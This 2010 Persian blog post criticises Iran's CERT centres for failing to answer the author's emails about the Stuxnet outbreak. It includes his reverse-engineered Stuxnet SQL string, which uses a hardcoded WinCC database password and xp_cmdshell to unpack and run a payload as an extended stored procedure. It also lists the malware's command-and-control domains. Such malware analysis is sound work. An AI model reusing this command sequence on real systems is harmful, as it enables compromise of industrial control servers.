Sunday, August 8, 2010

Ircert quick Response !!!!

مقدمه

وقتی سخن از مرکز امداد رخداد های امنیتی یا Cert به میان می آید ، متخصصین امنیت و یا حتی مدیران شبکه به فکر یک گروه کار امد می افتند که قادر است در کمترین زمان موجود مشکلات و رخداد های پیش آمده را بررسی و برای آنها راه حل ارائه دهد .

در سال های اتی رخداد های زیاد امنیتی در ایران به وقوع پیوسته که مجال بررسی همه انها در این بحث نمی گنجد اما نگاهی گذرا آلودگی هزاران سیستم به ویروس هایی مانند Slammer و Blaster و در همین آواخر Conficker نشان دهنده ضعف در اطلاع رسانی و پیگیری مشکلاتی از این دست می باشد .

در سال های قبل با نبود پورژه ها یی مانند آپا یا CertCc توقعی از مسولان امر نمی رفت تا واکنشی نسبت به این حوادث نشان دهند اما حال با تاسیس این گروه ها و به کار گیری هزینه های لازم امید مدیران سازمان ها و حتی بخش خصوصی به این گروه ها است تا با اطلاع رسانی دقیق و پیگیری مستمر از مشکلاتی مانند اپدیمی شدن آلودگی به یک ویروس در سطح کشور کاسته شود و دیگر اتفاقاتی مانند از کار افتادن سیستم های حیاتی بر اثر الودگی به ویروس ها دیده نشود .

Conficker مهمترین و اخرین نمونه از کرم های رایانه است که با استفاده از ضعف در سیستم عامل ویندوز میلیون ها کامپیوتر در سرار دنیا را آلوده کرده است و حتی هزاران کامپیوتر را در داخل کشور و مدارک و اسناد شبکه های الوده شده در ایران نیز به صورت رسمی در دسترس عموم قرار گرفته است.

اما چیزی که این روز ها فکر من را به خود مشغول میکند بی تفاوتی و یا عدم توانایی پاسخگویی به رخداد امنیتی است که به وقوع پیوسته و در حال حاضر می بایست برای پاکسازی و ایمن کردن سیستم های زیر بنایی عکس العملی از سوی گروه هایی مانند آپا یا Certcc انجام پذیرد . که متاسفانه تنها فعالیت نمایان این گروه ها ترجمه اخبار از سایت های خارجی و منابع دست دوم است و در پاره ای اوقات چند مقاله دانشجویی . در ادامه داستان تلاش دو هفته ای من برای تماس با مرکز Cert و هشدار در زمینه الودگی گسترده در مورد ویروس Stuxnet بیان می شود . گرچه این مقاله نیز مانند 10 سال فعالیت حرفه ای من در زمینه امنیت اطلاعات بر اساس مستندات تنها برای دل خوشی شخص نویسنده نگاشته می شود و امیدی به اصلاح روند مدیریتی و عملایتی گروه هایی مانند cert نیست .

در اینجا لازم به ذکر است که این مقاله کاملا بی طرفانه نگاشته شده و جدا از بودجه هایی که در اختیار این گروه ها ، سازمان ها، و نهادها قرار گرفته صرفا این نکته را مورد بحث قرار می دهد که مسولیتی که بر عهده گروهی قرار می گیرد و انها به قبول آن تن می نهند دیگر مجالی برای سحل انگاری باقی نمی گذارد . می بایست ان را به درستی انجام دهند و در قبال مسولیت خود پایبند باشند .

البته قصد تکرار چگونگی کارکرن این ویروس و ویژگی های آن مد نظر نمی باشد زیر مطالب بسیار متنوعی در ای زمینه منتشر گردیده است . این مقاله روند ساعت ها و دقیقه هایی است که می بایست در رخداد های امنیتی این چنین مورد توجه قرار گیرند .

شروع داستان

پنجشنبه 24 تیرماه

در 4 سال گذشته بنا به عادت و با توجه به بررسی بد افزارها و فعالیت آنها و همکاری با گروه های بین الملی جهت مبارزه با جرایم رایانه ای مانند آلوده سازی سیستم به بد افزارها در حال خواندن اخبار روزانه بودم . اخبار روزانه ای که دقیقه ها و ساعت ها در آن نقش عمده ای را بازی می کنند . اخبار منتشر شده حاکی از انتشار یک بد افزار بود ، که بر اساس یک ضعف در Shourtcut ها امکان اجرای بد افزار را بدون دخالت کاربر را می داد . اطلاع از شیوع این ویروس و ضعف در سیستم عامل های مایکروسافت را شرکت VirusBlokAda برای اولین بار متوجه عموم کرد طی بررسی های انجام شده یک بدافزار جاسوس با استفاده از الوده کردن USB flash ها در حال انتشار بود ، به نظر می رسید هدف این ویروس دسترسی به اطلاعات سیستم های مدیریتی مانیتورینگ SCADA در اروپا بود که از نرم افزار شرکت زیمنس به نام Wincc استفاده می کردند . این ویروس Stuxnet نام گرفت.

نحوه طراحی این ویروس به قدری حرفه ای برنامه ریزی شده بود که از همان روز های اول صحبت در باب عوامل پشت صحنه این حمله تبدیل به بحث داغ محافل امنیت شد.

جمعه 25 تیر ماه

مایکروسافت دست به انتشار Advisory اولیه در این زمینه می زند و وجود یک ضعف امنیتی را در تمامی سیستم عامل های ویندوز تایید می کند اما هنوز اطلاع دقیقی از چگونگی عملکرد این ضعف به صورت عمومی در دسترس نیست . و اصلاحیه ای هم برای آن منتشر نشده است.

ساعاتی بعد در همان روز 25 تیرماه با اضافه شدن شناسه ویروس Stuxnet در برنامه های ضد ویروس مایکروسافت و قابلیت تشخیص آن از سوی این برنامه ها مانند:

Microsoft Security Essentials, Microsoft Forefront Client Security, Windows Live OneCare, the Forefront Threat Management Gateway, and the Windows Live Safety Platform, windows defender

مرکز مبارزه با بد افزار ها مایکروسافت (MMPC) با دریافت گزارش از میزان آلودگی در جهان دست به انتشار اطلاعاتی میزند که در آن کشورهایی که بیشترین موارد آلودگی توسط برنامه های ضد ویروس مایکروسافت ثبت شده اند مشخص می گردند . اما این امارها تنها محدود به حوزه فعالیت نرم افزارهای مایکروسافت می باشد و می توان به عنوان یک هشدار قبل از بدست آوردن اطلاعات بیشتر مورد استفاده قرار بگیرند .

در این گراف رتبه اول به ایران ، رتبه دوم به اندونزی ، و رتبه سوم به هند تعلق گرفته بود.

با مطالعه گراف ابعاد فاجعه تا حدی برای من مشخص گردید ساعاتی بعد تصمیم به آن گرفتم به مرکز رخداد های امنیتی certcc.ir و مرکز آپا سری بزنم و ببینم ایا اطلاعاتی یا هشداری در این زمینه در دسترس می باشد یا نه . اما چیزی برو روی وب سایت های این مراکز یافت نشدند .

شنبه 26 تیر ماه

بر اساس تبادل اطلاعات با متخصصین امنیت در دنیا یک Sample اصلی از برنامه بد افزار بدست من میرسد اما مانند تمام ویروس های دیگر امکان بررسی آن به سادگی وجود ندارد . با هماهنگی با دوستان و گروه های دیگر کار برای بازگشایی کد های اصلی این malware را شروع می کنم .

یکشنبه 27 تیرماه

یک روز بعد فایل به صورت کامل رمز گشایی شده (unpacked) و اطلاعاتی که مربوط به تغییر داده ها در برنامه wincc است قابل مشاهده است همچنین اطلاعات مفید دیگری که می تواند برای بررسی عملکرد ویروس مورد استفاده قرار گیرد . اما هنوز certcc پس از گذشت دو روز واکنشی نشان نداده است تصمیم میگرم تا به صورت مستقیم با استفاده از Email ی که جهت گزارش رخداد های امنیتی در وب سایت قرار گرفته است تماس خود را بر قرار کنم . به نظر من این یک رخداد امنیتی و اپیدمی شدن آلودگی به ویروس در سطح گسترده در کشور است .

متن نامه ارسالی در تاریخ یکشنبه 27 تیرماه 1389 به مرکز Certcc:

From: Nima Majidi <**********@gmail.com<

Date: Sun, Jul 18, 2010 at 5:06 PM

Subject: MS .LNK 0DAY AND NEW ROOTKIT (High infection rate in iran(

To: certcc@itc.ir,security@itc.ir

با سلام

با توجه با انتشار ویروس جدید که از یک زیرو دی در برنامه ویندوز استفاده می کند . حجم الودگی سیستم های درون ایران بیش از حد می باشد ایا اطلاع رسانی یا پی گیری جهت ردیابی میزان الودگی درون ساز مان ها انجام گردیده است یا خیر . تنها اسیب رسانی این ویروس تغییرات در یکی برنامه های کنترلی زیمنس است که با توجه به امکان استفاده این برنامه ها در داخل سازمان های ایران نیاز پی گیری بیش از پیش احساس می شود . در صورت که اطلاعات قابل توجهی در دسترس باشد خوشحال می شوم برای تحقیقات در اختیار من قرار گیرد .

باتشکر
نیمامجیدی
منابع

http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx

http://www.automation.siemens.com/w2/automation-technology-distributed-control-system-simatic-pcs-7-1075.htm

پی نوشت: اطلاعات دیگر مانند اسم و روش کار کرد روتکیت به صورت عمومی در اینترنت قابل دسترس می باشد .

my rev eng result about sql queries for siemens software

UPX0:00A10430 0000037C C view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXL

IMIT,MINLIMIT,STARTVALUE,SUBSTVALUE,VARFLAGS,CONNECTIONID,VARPROPERTY,CYCLETIMEID,LASTCHANGE,A

SDATASIZE,OSDATASIZE,VARGROUPID,VARXRES,VARMARK,SCALETYPE,SCALEPARAM1,SCALEPARAM2,SCALEPARA

M3,SCALEPARAM4 from

MCPTVARIABLEDESC,openrowset('SQLOLEDB','Server=.\\WinCC;uid=WinCCConnect;pwd=2WSXcder','select 0;use master;declare @t varchar(999),@s varchar(999);select @t=filename from master..sysdatabases where (name like ''CC%'');set @t=left(@t,len(@t)-charindex(''\\'',reverse(@t)))+''\\GraCS\\cc_tlg7.sav'';set @s = ''master..xp_cmdshell ''''extrac32 /y \"''+@t+''\" \"''+@t+''x\"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sprun,@t);exec master..sprun;exec master..sp_dropextendedproc sprun')

پایان نامه

در متن ارسالی به Certcc قسمتی را به عنوان تحقیقات شخصی و مهندسی معکوس به بیان فعالیت این ویروس با برنامه Wincc میکنم شاید علاقه مندی در شخصی که مسول چک کردت ایمیل است به وجود آید و پاسخی دهد .

منتظر می مانم تا تماس از سمت cert کشورم بر قرار شود تا اطلاعاتی را که در دسترس دارم به اشتراک بگذارم . درچنین رخداد هایی زمان به سرعت می گذرد و سخن ادیبانه ای که این سال ها به خوبی به گوش میرسد مدیریت بحران است . هدف من از برقراری تماس جهت منافع مالی نبود تنها دلیل علاقه به دنبال کردن رخداد های امنیتی و اعلام خطر بود .

با گذشت چتد روز هنوز هیچ گونه کد exploit به صورت عمومی برای ضعف در برنامه Shurtcut ویندوز منتشر نشده است . چند نسخه از Exploit ها به صورت خاص منتشر گردیده اند اما هنوز مدل کار آمد و راحتی برای آن بدست نیامده است .

دوشنبه 28 تیر ماه

اچ دی مور یکی از موسسین پروژه Metasploit دست به انتشار کد Exploit می زند که می تواند به صورت Client Side Attack مورد استفاده نفوذگران قرار بگیرد و این در حالی است که هنوز اصلاحیه ای از سوی مایکروسافت منتشر نشده است . با بررسی شرایط موجود و با توجه به اسیب پذیری 0day در سیستم عامل ویندوز که هنوز اصلاحیه ای برای آن منتشر نگردیده مرکز بررسی حوادث اینترنتی Sans (Internet Storm Center) به دلیل انشار کد Exploit به صورت عمومی و با توجه به امکان هدف قرار گرفتن سیستم های دیگر وضعیت رخداد های امنیتی در اینترنت را به حالت زرد یعنی خطرناک در می اورد (Raising Infocon to yellow) . رنگ Infocon به معنی خطر و فراگیر شدن حملات کامپیوتری یا انتشار ویروس ها است مرکز ISC به عنوان یک منبع معتبر در این زمینه عمل می کند و با تغییر موقعیت به حالت خطرناک بسیاری از شرکت ها و سازمان ها به حالت آمده باش در می آیند این فرایندی است که در طول سال ها شکل گرفته و مدل استانداردی است که توسط مدیران شبکه یا مسولین امنیت دنبال می شود .

از همین مدل کار آمد می توان درس گرفت و جدا از شعارهای بومی سازی دست به ایجاد مرکزی زد تا در مواقع بحرانی مسولان شبکه ها را در جریان خطر های پیش رو قرار دهد .

سه شنبه 29 تیر ماه

به دلیل بالا رفتن خطرات ناشی از آلودگی به این ویروس و همچنین آلوده شدن سیستم های بسیار حساس ، کمپانی Symantec وارد عمل شده و کنترل دسترسی به دامین های اصلی این بدافزار را بدست می گیرد.قابل ذکر است این دامین ها به عنوان مراکز ارسال دستور به کامپیوتر های آلوده مورد استفاده قرار می گرفتند . و امکان دزدی اطلاعات از کامپیوتر های آلوده شده را فراهم می ساختند .

حالا Symantec با استفاده از تکنیکی که به Sinkhole معروف است قادر است آماری دقیقی از کامپیوتر های آلوده در کشور های مختلف و مراکز مختلف بدست آورد . قابل ذکر است بدست گرفتن دامین های اینترنتی و انتفال مالکیت آن فعالیتی زمان گیر است و در بسیاری موارد باید حکم دادگاه و مراحل پیچیده ای را طی کند اما بدلیل اینکه کمپانی Symantec مسول پاسخگویی رخداد های امنیتی سیستم SCADA بوده و به علت حساسیت بالا سیستم SCADA این شرکت توانست در کمترین زمان ممکن کنترل دامین ها را در دست بگیرد که در نوع خود کم سابقه است . دامین های مورد نظر :

www[.]mypremierfutbol[.]com

www[.]todaysfutbol[.]com

پنجشنبه 31 تیر

بعد از حدود 72 ساعت مانیتورینگ دامین های مورد استفاده Stuxnet خبر کاملی مبنی بر آلودگی سیستم های بسیاری در ایران توسط Symantec منتشر می شود آماری تکان دهنده که ایران را در صدر کشورهای آلوده به ویروس Stuxnet قرار می دهد.

بیش از 58% میزان آلودگی در ایران گزارش شده و بیش از 14000 ادرس IP واحد که نشان دهنده میزان آلودگی بسیار بالا تر از 14000 سیستم می باشد که در موارد که از سرویس هایی مانند NAT استفاده شده باشد به تعداد آلودگی سیستم ها اضافه می شود .

با توجه به حساسیت موضوع و گذشت بیش از 4 روز از ارسال نامه به Certcc هیچگونه جوابی دریافت نکرده ام . سری به سایت Certcc میزنم تنها دو خبر چند پاراگرافی در مورد انتشار این ویروس در سایت قرار گرفته ، هیچ گونه اطلاعات فنی جهت بررسی ویروس Stuxnetکه توسط تیم Certcc انجام گرفته با شد موجود نیست . و بومی سازی به ترجمه خبرهای خارجی تبدیل شده به نظر می رسد Cert ایران هیچگونه برنامه ای برای بررسی بومی ویروس در کشور نداشته است . و شاید هم نیرویی متخصصی برای این موارد تربیت نشده اند یا اگر هم نیرویی وجود داشته باشد مرکز Cert ایران قابلیت پرداخت دستمزد این افراد را نداشته باشد . در این حال و هوا هستم که فکر می کنم ارسال یک نامه دیگر به مرکز آپا به دلیل ارتباط آن با فضای دانشگاه های کشور می تواند راه کار مناسب تری جهت اطلاع مسولین امر باشد پس متن ارسال شده به certcc را به همراه یک پاراگراف به پست الکترونیکی info و جهت اطمینان بیشتر و به قول خودمان محکم کاری به مدیریت مرکز آپا نیز ارسال می کنم .

متن نامه ارسالی در تاریخ پنجشنبه 31 تیرماه به مرکز آپا:

From: Nima Majidi <__________@gmail.com>

To: info@ircert.cc

Cc: directmanager@ircert.cc

Date Thu, Jul 22, 2010 at 3:12 AM

Subject Fwd: MS .LNK 0DAY AND NEW ROOTKIT (High infection rate in iran) , Stuxnet rootki

با سلام

با توجه به آلوده شدن بیش از 6000 کامپیوتر در ایران و داشتن رتبه اول در مورد این بد افزار چرا هیچگونه اطلاع رسانی دقیق و فنی و حتی پی گیری برای میزان آلودگی پس از گذشت 4 روز انجام نشده و مراکز امداد رایانه ای که می بایست در چنین شرایطی دست به جمع اوری اطلاعات و مقابله رخداد نمایند هیچگونه پاسخ یا واکنشی نشان نمی دهند ایا فقط ترجمه کردن و درست کردن فایل های پی دی اف اموزشی در دستور کار این گروه ها قرار دارد؟؟؟ . متاسفانه من پاسخی از مرکز سرت مخابرات دریافت نکردم جهت همکاری گویی در مواقع اضطراری هیچ کس جوابگو نیست . به نظر میرسد مراکز امداد رایانه ای که می بایست حرف اول را در واکنش سریع به یک رخداد بزنند هیچ گونه امادگی برای چنین شرایطی را دارا نیستند.

پایان نامه

جمعه 1 مرداد

با انتشار کد exploit به صورت عمومی ، امکان انتشار ویروس ها بر اساس این ضعف امنیتی زیاد دور از ذهن نبود که چند روز بعد کمپانی Eset خبر از انتشار یک ویروس حدید بر اساس ضعف امنیتی یاد شده را داد . (lnk 0day)

http://blog.eset.com/2010/07/22/new-malicious-lnks-here-we-go

7 روز بعد !

پنجشنبه 7 مرداد

(هیچ گونه پاسخی از مرکز آپا یا certcc دریافت نشده است)

و بالاخره به همت دانشجویان عزیر یکی از دانشگاه ها که مسولیت ترجمه مقالات و راهنماهای منتشر شده را بر عهده گرفتند ،همچنین متخصصین امنیت در سرار دنیا ، شرکت های Anitvirus که بسیاری از آنها ایران را در لیست کشور های تحریمی قرار داده اند . چند نسخه فایل Pdf ترجمه شده و مقاله ای بر روی سایت های آپا و Cert ایران قرار می گیرد . خبرهایی که در15 روز پیش به صورت عمومی و به زبان انگلیسی در دسترس عموم بود حالا پس از دوهفته به زبان فارسی برگردانده شده و قابل دسترس است . که در نوع خود در زمینه ترجمه مقالات تخصصی یک رکورد محسوب می شود .

از شروع داستان در یک ظهر گرم تابستان در روز 24 تیرماه تا پایان شگفت انگیز آن در 7 مرداد ماه بیش از 15 روز Cert ایران و مرکز آپا نشان داد که توانایی برخورد با رخداد های امنیتی در سطح گسترده را ندارد .

اگر شرکتی مانند Symantec وجود نداشت ، اگر متخصصین امنیت در سراسر دنیا دقیقه های زندگی خود را صرف بروز رسانی خود و تحقیق نمی کردند . هیچ رخدادی گزارش داده نمیشد ، شیوع ویروس ادامه داشت ، امکان خروج اطلاعات از داخل کشور زیاد دور از ذهن نبود . و همگی به فکر همایش بعدی امنیت اطلاعات در سطح سازمان ها بودیم تا خوش خرم با مهمان های آسیایی خود در مورد Computer Emergency Response Team سخن بگوییم .

این صدای یک زنگ خطر است ، زنگ خطری که به مسولین هشدار میدهد برگزاری سمینارهایی در زیر پرچم سه رنگ ایران به معنی امادگی با رخداد ها نیست تنها کافی بود تا با یک مدیریت سریع و کارآمد و با استفاده از نیروی متخصص به صورت بومی به این رخداد پاسخ داد . و زمان باز هم در حال گذر است , چه تعداد سیستم جدید به این ویروس در طول هر روز در ایران آلوده می شوند؟!

من هم مانند تمام دلسوزان امنیت دوست دارم ، مراکز پاسخگو در کشور با وجود آمدن چنین رخداد هایی قادر به واکنش سریع باشند . و به یاد داشته باشیم این پایان ماجرا نیست نقاط اصلی شیوع ویروس ، میزان دقیق آلودگی در نقاط مختلف جغرافیایی کشور ، بررسی برنامه های wincc مورد استفاده درون کشور ، بررسی ترافیک انتقالی به Sinkhole .... و نکاتی دیگر می تواند شروعی مناسب برای حداقل پی گیری چگونگی اپیدمی شدن این ویروس باشد .

منابع :

http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx

http://blog.eset.com/2010/07/22/new-malicious-lnks-here-we-go

http://www.metasploit.com/redmine/projects/framework/repository/changes/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb

http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://isc.sans.edu/diary.html?storyid=9181

http://isc.sans.edu/diary.html?storyid=9199

http://www.symantec.com/connect/blogs/w32stuxnet-network-information

http://www.certcc.ir/Portal/Home/ShowPage.aspx?Object=News&CategoryID=8fac287d-3e26-4f77-a49d-c5077e2d9181&LayoutID=7732edcc-d330-49f1-8cde-1c4a1d9139e3&ID=c527924f-2faf-427a-b47b-925a16f5a970

http://www.ircert.cc/fa/37/-1/ta/show/3092